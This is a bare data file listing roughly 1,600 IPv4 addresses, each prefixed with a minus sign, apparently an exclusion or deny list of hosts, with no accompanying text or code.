-122.227.58.227 -198.200.41.83 -192.162.136.86 -200.146.194.137 -142.91.95.28 -112.74.74.216 -149.56.184.140 -91.109.3.69 -217.219.81.69 -31.24.227.89 -38.27.100.24 -198.8.88.201 -78.40.224.81 -95.47.161.74 -207.58.147.102 -123.29.75.74 -119.10.83.145 -106.37.219.94 -64.120.123.158 -91.123.200.78 -50.116.106.175 -212.129.37.4 -185.128.113.110 -217.112.131.169 -158.69.19.204 -222.191.250.80 -91.237.109.42 -192.80.147.68 -89.31.128.30 -31.182.55.234 -169.57.10.68 -139.255.69.38 -104.239.146.152 -184.154.52.84 -209.126.105.223 -103.20.189.132 -60.13.156.45 -54.223.168.196 -54.67.30.45 -219.159.248.221 -124.232.138.93 -167.114.48.62 -158.69.225.223 -23.224.242.27 -49.212.219.243 -23.225.239.208 -199.189.85.163 -185.22.234.46 -198.204.240.99 -23.225.239.71 -23.80.2.156 -72.1.245.72 -92.63.72.199 -89.35.217.20 -120.24.236.164 -107.148.194.31 -220.120.11.249 -107.150.57.27 -185.231.240.65 -192.99.78.29 -101.200.184.244 -123.57.220.59 -45.124.85.90 -23.224.242.61 -116.255.251.168 -107.191.45.139 -158.69.207.101 -61.252.139.101 -62.210.214.30 -54.241.28.237 -109.235.252.154 -103.57.190.80 -104.207.135.104 -219.132.128.164 -67.227.221.105 -79.137.42.54 -116.62.189.142 -46.32.228.139 -82.127.79.102 -120.27.221.12 -74.62.111.6 -95.211.153.55 -204.197.241.83 -151.248.126.150 -205.251.138.121 -206.221.179.116 -106.15.192.38 -123.207.141.155 -213.202.101.170 -202.153.178.199 -195.191.24.129 -209.95.43.98 -107.190.232.71 -101.50.1.61 -120.27.132.86 -77.81.191.152 -36.101.82.132 -103.45.2.214 -121.40.189.72 -113.31.16.73 -166.63.21.34 -193.151.70.10 -104.165.42.62 -121.69.23.206 -60.12.147.121 -115.29.151.69 -178.57.220.236 -23.224.115.194 -216.144.247.90 -168.90.104.85 -153.139.233.183 -79.134.207.231 -221.207.238.93 -67.215.14.117 -118.25.39.24 -121.40.76.9 -103.200.22.186 -209.195.20.42 -122.114.186.215 -23.244.190.12 -192.99.78.16 -91.209.94.230 -45.35.125.59 -103.213.251.47 -192.80.147.12 -74.63.209.38 -179.185.77.125 -121.43.225.210 -45.76.102.107 -123.138.158.66 -82.146.36.106 -103.200.6.24 -66.212.31.77 -192.163.253.225 -95.213.140.2 -37.59.80.203 -170.75.152.172 -45.118.252.19 -85.186.249.230 -117.121.231.218 -47.93.176.233 -142.91.95.194 -43.241.209.21 -111.75.211.90 -125.75.207.24 -185.158.115.159 -199.245.54.173 -65.52.244.169 -125.253.125.84 -209.188.8.182 -142.44.236.5 -149.56.165.173 -120.24.179.46 -142.4.203.199 -121.42.11.159 -223.94.75.162 -120.25.245.10 -35.201.190.146 -198.200.41.56 -173.9.132.170 -202.70.136.237 -192.99.182.190 -109.73.168.238 -45.117.175.3 -223.94.66.230 -65.60.5.86 -120.24.228.87 -103.84.90.243 -213.207.92.104 -47.93.32.84 -115.28.147.20 -188.132.228.107 -120.77.250.218 -54.238.251.65 -119.29.35.35 -103.55.25.126 -185.7.96.12 -91.121.70.161 -114.80.207.161 -169.48.200.185 -192.155.227.74 -5.135.67.77 -219.94.254.239 -80.179.219.62 -153.122.38.151 -149.210.172.239 -195.28.27.80 -114.215.203.28 -54.250.188.126 -59.153.61.179 -186.226.184.2 -66.79.186.58 -123.207.220.20 -121.40.254.245 -211.153.19.173 -139.162.12.237 -172.247.51.134 -47.88.5.114 -58.248.253.93 -212.101.106.30 -158.255.40.163 -124.43.18.136 -172.104.230.4 -115.239.197.174 -212.71.246.38 -204.15.135.134 -37.247.103.188 -205.209.135.73 -111.231.88.229 -120.27.236.72 -209.58.178.180 -61.144.97.18 -74.211.59.144 -163.172.137.227 -112.213.84.100 -193.93.221.168 -198.100.158.42 -111.198.58.22 -118.89.237.236 -185.69.152.214 -84.204.71.93 -193.254.216.123 -176.10.250.69 -67.225.248.40 -66.70.220.178 -166.63.21.17 -172.247.51.194 -146.148.48.44 -45.114.94.65 -119.28.68.83 -172.247.51.228 -45.76.98.153 -185.50.24.191 -46.166.134.46 -58.38.82.94 -69.65.56.182 -165.98.97.107 -82.98.68.138 -103.29.133.134 -121.41.73.232 -5.135.224.40 -119.17.212.26 -157.7.109.99 -112.121.189.74 -5.160.219.55 -118.178.236.14 -208.167.252.44 -23.104.135.66 -185.219.41.144 -194.2.231.103 -182.254.147.89 -103.75.46.108 -172.247.51.42 -162.144.66.44 -103.239.87.164 -23.104.135.85 -212.109.222.26 -101.251.251.130 -82.146.54.24 -194.181.113.132 -202.102.72.106 -164.160.33.191 -177.101.147.165 -115.183.14.22 -174.137.63.115 -54.251.46.24 -185.81.128.125 -47.93.230.200 -23.88.82.95 -121.40.17.93 -133.242.141.164 -200.55.136.34 -191.101.27.200 -89.208.146.239 -89.107.128.223 -212.32.235.120 -23.224.115.177 -115.159.153.249 -205.209.135.78 -115.239.209.73 -47.90.87.155 -212.96.127.228 -31.179.223.50 -60.211.204.202 -119.81.219.207 -198.143.3.186 -142.4.17.215 -92.43.114.252 -115.29.151.2 -167.114.54.85 -104.165.44.106 -220.197.198.146 -112.125.122.84 -149.56.165.166 -123.57.134.129 -210.233.70.45 -104.203.82.186 -202.152.20.131 -115.238.181.189 -202.130.44.173 -23.225.239.147 -23.88.158.107 -160.16.205.144 -123.56.86.126 -59.110.225.167 -115.159.58.155 -182.92.77.157 -188.165.187.166 -47.92.151.93 -91.215.218.18 -118.193.137.200 -94.23.86.133 -119.6.43.200 -66.70.223.77 -198.12.149.163 -118.89.235.214 -114.215.179.30 -114.85.46.206 -104.199.201.86 -23.244.190.21 -118.89.223.21 -64.120.123.174 -46.171.33.50 -200.75.46.123 -216.172.182.60 -201.49.21.109 -65.60.28.165 -91.195.56.131 -45.32.121.61 -45.32.103.124 -185.29.122.107 -221.234.36.103 -125.75.225.184 -45.76.181.236 -212.84.163.141 -45.76.144.53 -5.39.41.206 -158.69.181.152 -31.171.246.107 -91.229.44.2 -218.1.117.173 -104.192.86.115 -23.225.239.116 -82.135.148.137 -62.138.13.36 -80.241.209.170 -115.159.146.121 -43.252.156.90 -104.203.82.23 -116.213.204.11 -45.114.94.57 -31.171.249.246 -115.159.38.150 -120.132.97.199 -194.58.100.216 -153.122.16.172 -45.114.94.128 -23.225.89.19 -23.244.241.248 -67.222.14.54 -123.57.136.88 -77.75.124.165 -178.33.252.95 -113.66.158.94 -81.169.202.48 -104.168.149.228 -23.224.245.23 -136.144.140.62 -46.183.165.37 -65.60.5.107 -54.162.151.84 -192.99.78.23 -5.196.246.197 -196.30.251.179 -78.140.197.26 -45.252.250.129 -37.72.171.179 -43.225.157.135 -222.171.247.217 -190.26.220.70 -123.56.158.142 -119.29.219.103 -46.45.160.73 -120.85.134.119 -64.118.81.245 -199.102.46.200 -123.207.137.164 -51.254.5.214 -115.28.21.253 -23.88.82.38 -116.30.123.50 -153.120.170.40 -197.232.49.35 -139.159.238.241 -43.255.39.22 -59.41.39.71 -119.1.96.45 -180.235.133.205 -23.225.239.21 -121.43.163.85 -119.53.209.101 -142.91.95.188 -183.129.228.34 -52.23.217.180 -121.41.13.126 -112.124.32.39 -114.215.101.111 -132.148.80.61 -162.247.235.66 -123.57.156.78 -23.88.82.239 -178.132.1.81 -75.103.110.31 -23.104.135.6 -120.25.158.82 -111.198.22.136 -103.10.168.130 -103.21.182.194 -108.179.224.172 -54.83.96.133 -45.77.30.216 -184.168.100.3 -158.69.142.150 -173.249.1.97 -144.168.69.157 -23.225.239.231 -34.201.121.195 -160.16.146.96 -37.200.67.50 -193.70.71.27 -46.166.130.45 -69.13.210.177 -142.91.95.111 -54.164.20.4 -183.62.40.156 -69.12.70.74 -123.59.116.216 -23.225.89.62 -138.201.205.164 -23.83.201.131 -172.104.239.211 -153.126.147.244 -121.43.112.222 -120.24.95.25 -35.201.166.47 -64.120.123.195 -5.189.128.49 -104.239.135.211 -121.41.5.146 -62.75.241.55 -23.244.241.196 -171.8.68.140 -123.207.211.60 -35.189.163.127 -216.14.118.119 -195.10.21.174 -195.175.227.141 -103.27.238.163 -23.244.190.88 -153.122.2.59 -119.29.179.209 -120.26.118.58 -50.31.0.160 -47.90.64.109 -202.137.10.183 -114.55.3.159 -45.32.131.92 -74.122.121.179 -120.24.84.71 -62.173.142.5 -45.76.104.168 -114.55.4.242 -153.146.168.192 -39.108.59.67 -54.169.94.176 -5.135.54.163 -139.199.184.33 -34.234.91.60 -96.127.184.203 -185.92.222.169 -64.131.72.43 -139.162.79.46 -118.190.82.85 -115.159.90.115 -198.57.161.37 -123.31.45.65 -188.132.228.110 -92.63.96.101 -173.212.212.55 -54.197.241.155 -175.107.63.57 -109.235.252.135 -31.145.62.67 -185.8.172.199 -46.4.63.222 -198.74.52.251 -23.224.115.206 -195.16.91.12 -223.68.183.24 -45.61.115.33 -37.59.81.71 -203.171.244.3 -103.224.251.70 -219.144.68.15 -47.52.68.215 -116.62.20.146 -122.144.200.11 -94.237.35.58 -114.80.96.7 -137.74.206.222 -108.179.240.181 -31.179.223.55 -183.62.24.211 -111.170.235.72 -216.17.101.49 -103.80.238.142 -89.140.10.48 -47.52.62.43 -52.77.128.36 -51.254.4.190 -220.73.163.74 -178.32.112.48 -103.90.228.122 -218.93.206.49 -47.92.24.134 -45.40.163.106 -162.13.226.18 -185.174.29.230 -117.48.214.164 -118.97.213.248 -212.84.163.140 -23.224.244.30 -43.254.3.235 -211.103.184.100 -185.174.31.214 -137.74.90.66 -37.48.76.131 -120.24.92.215 -182.254.221.16 -13.114.171.179 -192.155.227.78 -173.255.229.157 -142.91.95.76 -66.212.31.70 -91.121.133.76 -88.198.145.19 -120.24.177.5 -64.118.92.13 -23.88.82.76 -120.77.59.133 -66.39.151.233 -54.144.27.11 -185.75.182.43 -101.37.174.190 -202.169.62.14 -23.225.239.5 -52.76.179.166 -107.22.163.40 -118.89.163.234 -23.244.90.14 -67.231.243.46 -54.36.188.82 -75.103.109.194 -64.120.123.235 -66.70.212.238 -162.247.234.90 -95.218.151.245 -91.121.218.65 -123.56.21.237 -103.253.107.181 -51.255.140.20 -124.117.249.154 -23.225.89.205 -123.116.63.232 -69.65.33.116 -185.106.21.13 -23.225.239.197 -31.179.223.54 -123.31.12.247 -180.222.190.148 -101.37.14.23 -45.119.118.243 -118.89.143.86 -116.62.120.2 -116.55.251.91 -144.48.124.206 -27.254.137.210 -104.224.205.98 -120.77.32.220 -184.19.230.19 -118.193.240.250 -34.225.118.71 -60.205.170.58 -121.40.72.38 -158.69.51.6 -74.208.145.168 -94.23.104.152 -121.199.49.172 -101.37.164.202 -81.19.124.181 -189.48.153.8 -109.237.217.63 -125.99.158.58 -202.109.243.175 -113.119.196.175 -123.56.197.249 -103.72.216.26 -23.244.190.27 -104.207.50.93 -202.162.234.214 -35.158.93.73 -139.196.232.50 -54.37.216.234 -118.193.201.91 -59.153.61.182 -121.43.60.2 -62.138.137.95 -72.1.245.128 -23.244.241.95 -51.255.152.202 -190.12.41.50 -120.55.88.9 -220.226.188.14 -202.183.226.149 -115.159.1.142 -42.112.25.195 -111.231.99.163 -139.159.234.143 -23.225.113.229 -120.76.208.251 -23.225.239.189 -177.70.98.86 -190.111.120.12 -52.47.147.75 -65.60.28.164 -144.217.6.79 -82.135.149.234 -164.132.11.223 -213.32.108.226 -69.175.18.41 -5.39.25.61 -64.118.92.55 -121.34.30.160 -45.77.167.87 -23.224.115.129 -45.252.249.224 -23.244.241.21 -197.232.58.228 -121.40.46.236 -76.12.219.12 -37.59.62.31 -78.24.218.145 -60.205.151.32 -139.199.62.193 -183.136.232.197 -120.25.241.168 -185.52.1.108 -89.163.155.118 -134.119.189.2 -104.165.37.252 -23.225.113.201 -218.56.155.71 -103.16.133.254 -66.220.11.147 -45.76.31.98 -45.114.94.55 -193.189.75.142 -132.148.16.86 -123.207.173.136 -37.72.184.180 -199.217.116.41 -37.48.66.34 -45.32.111.229 -37.59.114.249 -115.29.232.88 -217.160.236.157 -93.174.163.195 -62.213.58.8 -101.69.180.175 -50.22.198.214 -120.76.210.225 -198.71.54.83 -91.241.66.216 -23.224.242.23 -104.203.82.245 -162.219.98.8 -78.110.170.227 -177.12.239.134 -182.254.227.87 -54.88.121.77 -112.78.183.125 -23.224.40.187 -217.197.124.35 -162.144.124.237 -58.221.146.101 -199.101.184.210 -117.27.251.149 -182.156.197.123 -65.60.43.175 -218.23.24.161 -54.152.98.61 -82.135.148.245 -125.62.47.163 -83.132.167.72 -93.49.170.200 -115.29.177.90 -41.217.202.52 -210.3.38.176 -164.132.7.166 -183.181.172.59 -122.154.43.74 -23.224.243.55 -67.222.143.117 -120.24.237.222 -103.215.81.131 -23.244.190.10 -132.148.25.140 -119.10.67.150 -203.160.94.168 -65.164.104.188 -119.97.180.89 -173.249.39.95 -123.57.67.24 -118.178.88.160 -121.40.21.177 -144.168.71.130 -109.238.10.147 -83.99.248.130 -64.34.165.237 -35.201.139.33 -118.89.32.130 -218.244.142.220 -115.28.175.237 -176.74.217.53 -142.44.242.185 -172.247.51.64 -114.55.177.66 -42.121.5.89 -145.239.74.215 -221.122.32.44 -52.77.104.210 -103.229.162.52 -190.187.120.246 -103.74.118.114 -23.244.241.170 -46.166.134.45 -157.7.130.198 -111.93.165.246 -120.26.210.186 -23.104.135.175 -162.144.63.70 -115.28.188.9 -176.223.197.43 -45.114.94.119 -104.203.82.75 -182.16.29.84 -142.4.103.117 -222.85.129.221 -120.76.156.55 -123.207.238.35 -195.2.253.122 -104.203.82.95 -106.37.169.66 -112.15.173.35 -91.102.160.53 -117.184.72.230 -122.224.196.87 -142.4.208.144 -23.244.190.181 -66.135.63.116 -222.73.31.61 -112.74.79.131 -37.123.99.66 -197.248.126.187 -23.224.115.172 -91.229.44.4 -23.244.190.237 -91.186.19.90 -107.180.70.136 -23.244.241.104 -23.224.244.27 -103.105.156.90 -185.174.28.144 -61.186.137.165 -80.241.208.246 -54.65.171.169 -121.41.128.207 -106.42.62.20 -123.57.137.243 -95.163.78.236 -114.215.169.119 -220.95.254.6 -110.173.59.20 -46.105.108.186 -212.42.119.2 -109.108.142.93 -121.43.235.99 -120.27.112.120 -47.96.191.46 -153.121.75.19 -142.4.107.195 -45.118.248.61 -133.242.179.52 -74.208.46.122 -23.88.82.172 -66.178.195.69 -213.32.78.124 -158.69.3.244 -176.31.138.33 -82.135.148.208 -23.253.20.136 -193.112.100.65 -124.192.148.8 -223.68.208.16 -220.167.100.21 -121.201.18.148 -149.56.165.163 -46.105.172.247 -120.79.174.15 -176.31.16.52 -113.10.192.134 -178.33.15.71 -213.233.175.250 -23.225.239.34 -220.170.193.131 -45.76.122.212 -159.253.45.63 -172.247.51.208 -192.187.113.30 -45.76.163.15 -67.222.138.146 -89.19.8.211 -121.41.100.197 -117.25.149.237 -23.104.135.168 -189.236.47.181 -109.194.195.242 -23.225.89.238 -81.177.37.73 -66.70.212.237 -198.50.144.206 -178.238.235.161 -121.201.9.232 -47.75.13.246 -35.193.151.239 -72.1.245.22 -54.201.43.163 -45.119.118.134 -217.145.92.8 -111.230.231.201 -52.86.28.211 -54.36.44.131 -23.244.190.223 -200.44.112.82 -199.119.141.132 -50.62.133.19 -81.177.140.37 -103.37.1.107 -42.121.57.135 -23.224.115.213 -50.63.161.141 -185.58.73.69 -39.107.64.245 -67.207.180.230 -172.246.101.158 -104.224.203.146 -92.222.160.54 -172.110.20.131 -85.204.96.165 -59.110.164.194 -52.220.20.236 -69.147.236.203 -47.93.42.47 -222.240.176.133 -144.217.158.245 -37.252.102.206 -161.202.188.74 -23.225.89.156 -69.64.73.234 -149.56.165.169 -101.200.206.19 -23.246.253.250 -54.72.165.83 -216.131.90.237 -183.0.186.67 -107.190.143.122 -212.34.47.180 -31.148.96.183 -69.64.42.131 -103.45.99.122 -175.184.39.191 -91.134.207.242 -54.36.251.95 -198.7.56.77 -69.13.198.131 -1.83.102.18 -150.129.42.135 -172.246.101.113 -54.90.237.39 -54.223.105.61 -41.221.96.66 -149.202.28.13 -193.200.241.38 -166.62.34.153 -209.141.49.156 -222.23.86.112 -23.224.115.139 -121.40.130.67 -115.28.141.85 -64.120.123.218 -162.247.233.46 -23.225.239.109 -82.192.86.206 -43.230.202.37 -210.245.8.10 -112.74.25.11 -184.173.78.232 -69.28.224.181 -23.104.135.124 -115.29.202.133 -119.57.112.234 -66.70.214.252 -111.171.223.24 -119.28.45.218 -52.34.149.197 -153.120.40.181 -64.118.90.221 -54.64.161.93 -23.225.239.251 -182.239.43.230 -65.60.5.123 -109.254.251.251 -202.223.211.233 -120.25.217.73 -218.16.129.67 -118.69.196.118 -118.190.94.50 -43.246.216.226 -219.128.242.66 -219.148.43.93 -209.236.120.213 -209.23.127.89 -23.104.135.101 -108.161.140.176 -155.254.18.254 -14.140.149.172 -63.217.86.78 -37.48.101.204 -45.114.117.209 -103.27.60.190 -121.40.208.1 -54.193.73.147 -109.235.252.157 -50.22.56.31 -115.29.146.4 -58.35.79.49 -184.164.143.235 -95.163.78.237 -95.158.131.144 -172.246.101.39 -103.9.79.125 -217.182.244.137 -175.153.114.43 -103.27.200.189 -109.123.94.207 -54.159.94.20 -23.225.113.121 -116.62.27.199 -82.194.87.152 -218.4.106.194 -45.32.210.156 -54.175.120.100 -165.255.239.100 -82.135.151.201 -217.160.132.125 -54.173.89.166 -47.92.106.250 -183.237.246.98 -195.174.35.192 -82.135.151.154 -121.199.14.47 -118.121.232.7 -65.18.120.17 -166.63.21.33 -66.254.163.6 -91.218.231.125 -5.196.105.21 -23.225.239.250 -91.250.118.148 -23.224.115.197 -82.165.36.15 -45.32.45.46 -5.39.65.40 -175.41.130.128 -104.203.82.66 -52.178.193.128 -119.29.10.198 -59.7.18.158 -119.23.243.185 -23.244.190.171 -23.225.113.214 -82.146.36.154 -142.4.107.216 -103.96.140.66 -52.71.38.129 -106.39.117.86 -77.245.158.249 -172.104.26.108 -23.224.242.32 -50.116.107.180 -118.89.162.67 -37.59.81.78 -100.43.157.172 -45.63.0.135 -45.64.169.42 -91.241.66.44 -120.55.76.52 -185.174.29.167 -198.200.41.49 -85.254.49.14 -94.138.213.148 -103.48.194.2 -111.231.197.150 -101.251.253.146 -172.246.101.210 -121.41.26.77 -185.174.28.70 -198.143.130.115 -92.243.12.240 -205.209.155.210 -188.165.132.222 -172.80.1.227 -45.56.90.125 -211.148.147.202 -87.98.161.10 -123.56.142.42 -176.31.238.216 -45.64.170.231 -47.104.72.189 -178.33.115.14 -133.242.52.168 -117.82.25.228 -120.27.52.50 -120.76.158.48 -185.57.81.8 -193.106.218.3 -182.92.128.166 -23.225.89.68 -199.230.109.116 -185.43.5.226 -121.40.37.2 -119.23.76.88 -185.174.29.210 -23.235.234.97 -112.74.74.52 -201.16.140.144 -185.27.134.134 -166.62.74.197 -198.200.41.108 -116.66.238.67 -166.63.21.94 -120.55.46.228 -212.112.216.24 -23.244.190.20 -192.80.147.29 -168.196.63.2 -187.157.148.169 -65.60.22.26 -202.177.212.219 -120.199.9.147 -23.224.243.28 -117.107.154.42 -93.191.129.198 -118.145.2.8 -184.154.97.99 -88.198.125.194 -185.174.31.221 -23.224.115.180 -23.92.78.103 -104.207.40.163 -172.104.190.41 -171.244.0.102 -109.201.149.175 -47.92.88.227 -185.198.57.153 -151.80.81.127 -149.71.103.48 -118.193.206.214 -220.194.59.77 -192.80.147.125 -122.224.9.161 -23.88.82.138 -199.168.189.7 -23.225.113.19 -51.15.129.225 -218.66.104.199 -118.178.130.102 -123.207.240.101 -114.215.179.88 -104.207.50.68 -88.189.226.202 -54.255.248.235 -81.2.250.26 -112.74.197.189 -85.17.174.132 -210.83.225.26 -72.1.245.107 -115.159.218.198 -185.74.254.22 -106.187.39.4 -45.61.112.13 -96.84.17.196 -167.114.178.212 -104.207.40.134 -45.77.239.230 -52.58.95.8 -114.55.73.130 -108.61.177.25 -100.43.152.125 -187.63.183.27 -23.225.239.143 -139.196.202.245 -72.2.5.33 -118.190.64.106 -23.225.239.130 -23.227.133.35 -185.195.77.65 -118.190.146.100 -103.55.12.235 -103.9.76.215 -64.120.123.202 -27.42.156.229 -103.239.28.16 -39.107.58.199 -195.122.191.91 -62.176.2.146 -119.28.12.12 -187.33.225.182 -103.20.193.52 -68.64.163.75 -103.81.168.152 -205.209.155.207 -119.23.27.209 -206.31.252.49 -70.36.125.55 -65.60.43.167 -23.104.135.228 -104.165.37.230 -192.126.114.254 -222.165.227.11 -5.43.224.80 -118.126.64.196 -166.62.119.133 -36.72.230.214 -79.174.65.169 -23.244.190.129 -123.133.78.42 -148.251.176.241 -23.224.115.66 -209.58.177.240 -124.67.70.178 -119.28.61.168 -139.129.96.181 -54.36.188.201 -115.159.113.36 -172.247.51.146 -59.63.169.136 -52.203.5.255 -61.133.219.78 -45.61.112.36 -118.178.193.9 -45.33.25.171 -69.1.98.40 -23.104.135.125 -94.23.253.34 -111.68.12.93 -185.126.218.173 -182.92.160.60 -39.107.69.63 -94.23.219.86 -164.52.150.234 -86.104.177.102 -179.43.134.229 -77.93.207.48 -120.78.229.154 -54.223.176.56 -202.96.137.78 -115.239.24.57 -139.196.35.193 -99.198.111.114 -49.212.201.86 -91.121.169.204 -106.15.170.42 -213.189.63.233 -114.55.86.7 -115.159.183.122 -115.159.183.122 -174.137.63.120 -133.242.16.200 -54.235.89.130 -162.247.76.175 -216.189.156.150 -85.204.96.139 -47.94.229.24 -45.61.113.29 -94.224.140.109 -172.93.102.147 -37.75.11.123 -173.224.116.159 -193.70.50.64 -121.201.32.76 -77.72.134.10 -47.90.79.232 -139.224.68.71 -23.244.241.163 -122.10.117.134 -40.68.227.231 -86.104.177.49 -139.162.132.56 -118.184.39.142 -194.58.111.81 -23.225.113.235 -123.207.72.158 -23.225.239.15 -114.55.109.21 -103.84.39.82 -52.196.128.10 -196.168.170.106 -217.182.176.208 -108.61.127.7 -124.205.31.122 -94.102.8.68 -34.228.212.167 -194.135.88.172 -212.252.213.251 -217.113.1.200 -192.99.249.75 -45.40.137.163 -34.201.141.114 -114.55.110.201 -169.54.217.81 -131.100.25.244 -106.15.47.127 -189.254.117.43 -158.69.145.84 -198.1.188.70 -112.74.104.101 -86.104.177.28 -23.224.115.190 -54.153.5.217 -114.119.9.158 -23.254.215.241 -51.255.140.234 -163.44.175.97 -107.165.11.123 -182.92.213.152 -142.44.201.202 -50.116.108.35 -52.6.228.66 -104.203.82.161 -173.249.159.3 -62.12.117.107 -198.27.123.226 -31.179.223.57 -23.88.82.179 -198.56.192.94 -23.247.25.7 -1.119.129.190 -195.2.87.1 -211.125.90.71 -172.247.51.46 -120.24.223.63 -115.47.124.222 -185.106.23.13 -23.104.135.47 -192.80.147.207 -198.57.223.14 -123.55.88.112 -88.85.84.112 -103.247.22.38 -153.122.116.11 -39.108.69.54 -23.104.135.148 -205.209.135.75 -157.7.207.228 -185.5.251.99 -209.161.6.2 -94.237.37.14 -119.28.15.218 -163.177.25.54 -103.249.0.36 -103.6.246.18 -61.147.88.16 -192.165.228.26 -77.240.90.34 -119.29.65.216 -5.196.108.133 -103.7.43.173 -211.144.136.102 -5.100.254.231 -222.129.11.163 -202.153.179.196 -134.119.219.189 -139.162.28.52 -78.108.94.157 -133.242.226.136 -213.85.31.26 -52.90.150.174 -23.224.115.239 -139.129.5.74 -180.100.214.197 -50.56.175.158 -209.95.39.219 -101.201.77.29 -109.206.190.29 -34.207.116.106 -23.88.82.99 -51.254.5.206 -220.226.210.53 -50.116.6.60 -112.74.66.193 -107.155.198.138 -45.32.116.229 -119.28.194.169 -191.96.102.125 -199.182.59.125 -123.163.167.104 -173.212.244.100 -66.154.123.116 -204.77.0.237 -198.50.243.249 -123.57.17.62 -192.40.58.8 -144.217.66.223 -113.53.228.93 -98.126.70.22 -186.226.61.114 -37.220.20.251 -34.203.6.62 -119.60.0.154 -117.27.248.87 -82.135.148.244 -219.94.234.196 -119.23.19.201 -81.219.171.68 -47.95.205.120 -52.193.99.105 -182.92.212.38 -192.80.147.137 -148.251.33.93 -172.247.51.149 -212.115.229.88 -207.36.250.171 -54.37.221.122 -88.80.190.110 -200.128.35.53 -185.92.72.98 -72.1.245.63 -131.161.255.121 -123.59.188.3 -1.195.122.78 -109.73.168.223 -13.126.91.146 -103.54.127.12 -185.174.28.71 -123.57.21.139 -38.100.118.51 -188.165.208.219 -112.74.212.176 -185.41.163.9 -120.25.160.10 -103.200.5.240 -120.55.166.16 -144.217.224.238 -176.223.197.35 -178.32.248.214 -94.242.238.171 -198.50.191.107 -74.208.75.225 -119.29.140.241 -120.92.59.13 -54.65.15.117 -23.104.135.20 -85.255.10.224 -12.169.128.136 -193.112.13.204 -123.206.122.15 -101.200.192.79 -198.50.176.70 -218.32.216.231 -104.207.44.110 -111.230.222.242 -185.5.248.134 -5.189.171.177 -47.97.26.214 -23.225.239.94 -23.225.113.77 -108.179.218.219 -91.93.47.114 -104.168.142.171 -115.29.160.227 -142.91.95.35 -153.121.35.36 -142.4.103.69 -192.169.203.214 -142.91.95.44 -23.224.244.58 -178.32.114.139 -85.11.0.234 -104.203.82.230 -103.72.166.22 -112.91.25.182 -41.220.29.196 -104.207.40.144 -192.80.147.26 -162.247.232.86 -47.98.32.238 -121.52.223.197 -77.244.223.157 -212.71.232.177 -69.13.210.169 -52.220.42.42 -78.111.82.107 -196.1.4.10 -125.35.66.162 -173.208.211.211 -142.4.119.97 -23.104.135.141 -50.28.49.204 -41.206.193.138 -121.43.226.11 -106.14.46.113 -114.55.86.205 -142.4.107.207 -13.113.20.121 -116.196.70.21 -222.140.17.73 -60.205.185.101 -130.215.36.33 -31.171.246.29 -122.102.32.232 -195.2.252.14 -114.242.245.127 -222.177.118.201 -217.115.137.197 -37.48.73.240 -173.249.3.36 -121.40.90.176 -201.73.1.35 -5.149.248.121 -123.138.75.169 -103.80.240.9 -23.244.190.176 -103.246.152.39 -23.244.241.168 -68.115.193.100 -47.93.128.122 -58.34.195.213 -162.247.233.44 -45.32.106.150 -183.17.225.125 -112.124.127.70 -118.190.23.97 -70.35.206.50 -72.1.245.10 -69.175.18.35 -23.88.82.234 -112.74.29.101 -115.159.211.147 -144.172.80.211 -122.155.201.242 -112.74.187.154 -210.71.198.231 -82.135.151.164 -112.74.112.209 -50.30.37.177 -50.28.61.151 -124.65.73.158 -36.7.140.77 -153.122.66.219 -23.104.135.116 -95.168.209.223 -178.32.213.187 -116.62.14.63 -123.57.152.162 -47.88.13.229 -27.50.17.14 -23.244.190.95 -103.216.102.64 -114.215.202.51 -95.67.120.146 -66.154.119.45 -103.99.61.233 -149.56.184.136 -107.181.251.151 -23.252.6.15 -109.123.155.176 -139.196.72.7 -115.28.176.103 -108.166.90.250 -78.24.216.49 -116.90.4.130 -173.236.115.164 -5.189.171.225 -103.200.118.38 -72.32.232.37 -115.126.53.102 -172.246.101.203 -217.113.62.161 -194.79.29.198 -120.55.64.60 -112.219.92.196 -106.14.40.73 -47.100.115.230 -66.155.105.247 -103.250.21.104 -201.31.214.2 -199.91.172.54 -187.84.144.190 -47.94.215.17 -45.121.163.7 -133.242.10.61 -188.165.176.117 -47.94.227.163 -200.107.18.14 -124.238.251.10 -121.42.147.59 -201.234.239.58 -185.12.95.174 -46.252.188.11 -61.160.254.6 -122.7.81.10 -173.255.216.134 -23.225.239.46 -39.106.50.162 -45.252.250.175 -196.190.28.100 -177.66.172.88 -23.224.245.55 -133.130.117.99 -60.205.58.30 -188.35.188.7 -114.215.84.213 -103.81.168.208 -198.50.247.26 -39.108.208.65 -23.224.244.55 -210.184.202.34 -213.85.31.23 -123.150.244.29 -218.93.206.81 -87.103.130.141 -82.135.151.219 -118.185.114.171 -23.244.190.215 -23.224.115.19 -221.204.238.35 -116.62.168.217 -52.211.11.153 -50.17.253.243 -58.211.23.84 -187.102.118.217 -79.99.203.36 -23.104.135.61 -188.132.147.20 -104.203.82.203 -101.200.46.230 -146.71.124.205 -182.16.43.171 -123.103.113.53 -216.131.95.200 -123.56.161.210 -119.29.14.226 -112.121.189.77 -104.207.44.100 -103.236.222.6 -34.225.130.39 -192.80.147.73 -182.131.21.2 -202.10.78.45 -45.118.248.82 -60.223.251.52 -184.154.202.148 -178.20.155.23 -45.76.147.248 -104.207.133.24 -39.108.136.125 -124.42.54.57 -192.69.77.194 -37.228.92.8 -47.52.26.254 -23.225.239.175 -190.9.34.98 -66.70.158.70 -46.105.104.211 -47.100.199.215 -207.91.31.172 -23.244.190.100 -202.188.29.3 -52.90.252.218 -142.44.201.193 -118.193.201.94 -106.75.16.170 -23.225.113.182 -23.224.115.205 -109.73.168.253 -54.198.1.209 -23.244.190.77 -123.29.68.36 -173.236.25.26 -101.201.80.47 -198.200.41.118 -23.225.113.25 -123.207.120.165 -106.15.42.202 -123.57.147.173 -124.172.250.27 -173.249.17.113 -14.54.122.142 -176.223.197.61 -192.99.78.10 -60.205.140.38 -211.159.185.98 -69.30.211.212 -115.29.106.53 -219.94.243.152 -66.254.178.30 -125.212.228.131 -37.59.213.65 -185.174.30.171 -176.223.197.56 -139.129.194.122 -144.168.72.141 -186.209.152.120 -104.207.44.106 -201.90.89.185 -23.224.115.31 -66.220.11.151 -23.225.239.2 -120.76.236.1 -216.131.75.7 -209.237.252.18 -60.8.5.52 -139.199.74.67 -58.20.51.240 -45.33.75.106 -198.44.66.155 -142.91.95.119 -74.118.183.69 -183.111.138.153 -45.32.35.31 -109.73.168.210 -130.211.190.55 -115.146.126.207 -45.77.41.114 -172.247.51.247 -23.225.239.217 -23.89.140.173 -116.255.191.3 -47.91.23.234 -121.199.60.1 -173.214.190.86 -118.190.157.121 -114.215.165.250 -23.244.241.209 -173.208.187.130 